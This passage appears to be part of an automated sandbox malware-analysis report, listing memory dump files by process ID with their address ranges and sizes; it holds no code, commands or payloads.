                                                                            • memory/5036-365-0x0000000000000000-mapping.dmp
                                                                            • memory/5048-257-0x0000000000DF0000-0x0000000000DF1000-memory.dmp
                                                                              Filesize

                                                                              4KB

                                                                            • memory/5048-228-0x0000000000000000-mapping.dmp
                                                                            • memory/5048-282-0x0000000005760000-0x0000000005761000-memory.dmp
                                                                              Filesize

                                                                              4KB

                                                                            • memory/5056-314-0x0000000000F60000-0x0000000000F61000-memory.dmp
                                                                              Filesize

                                                                              4KB

                                                                            • memory/5056-329-0x0000000005530000-0x0000000005531000-memory.dmp
                                                                              Filesize

                                                                              4KB

                                                                            • memory/5056-229-0x0000000000000000-mapping.dmp
                                                                            • memory/5056-299-0x00000000772A0000-0x000000007742E000-memory.dmp
                                                                              Filesize

                                                                              1.6MB

                                                                            • memory/5072-385-0x0000000004C20000-0x0000000004C21000-memory.dmp
                                                                              Filesize

                                                                              4KB

                                                                            • memory/5072-230-0x0000000000000000-mapping.dmp
                                                                            • memory/5072-250-0x0000000000380000-0x0000000000381000-memory.dmp
                                                                              Filesize

                                                                              4KB

                                                                            • memory/5084-231-0x0000000000000000-mapping.dmp
                                                                            • memory/5096-289-0x0000000002360000-0x0000000002361000-memory.dmp
                                                                              Filesize

                                                                              4KB

                                                                            • memory/5096-305-0x00000000023A0000-0x00000000023A1000-memory.dmp
                                                                              Filesize

                                                                              4KB

                                                                            • memory/5096-298-0x0000000002370000-0x0000000002393000-memory.dmp
                                                                              Filesize

                                                                              140KB

                                                                            • memory/5096-297-0x000000001ADC0000-0x000000001ADC2000-memory.dmp
                                                                              Filesize

                                                                              8KB

                                                                            • memory/5096-278-0x0000000000280000-0x0000000000281000-memory.dmp
                                                                              Filesize

                                                                              4KB

                                                                            • memory/5096-232-0x0000000000000000-mapping.dmp
                                                                            • memory/5100-413-0x0000000000400000-0x00000000004A1000-memory.dmp
                                                                              Filesize

                                                                              644KB

                                                                            • memory/5100-405-0x000000000046B76D-mapping.dmp
                                                                            • memory/5200-530-0x0000000000000000-mapping.dmp
                                                                            • memory/5248-431-0x00000000046FF000-0x0000000004800000-memory.dmp
                                                                              Filesize

                                                                              1.0MB

                                                                            • memory/5248-423-0x0000000000000000-mapping.dmp
                                                                            • memory/5248-433-0x0000000002B90000-0x0000000002CDA000-memory.dmp
                                                                              Filesize

                                                                              1.3MB

                                                                            • memory/5664-499-0x0000000000000000-mapping.dmp
                                                                            • memory/5856-502-0x0000000000000000-mapping.dmp
                                                                            • memory/5932-546-0x0000000000000000-mapping.dmp
                                                                            • memory/6028-513-0x0000000000000000-mapping.dmp
                                                                            • memory/6132-516-0x0000000000000000-mapping.dmp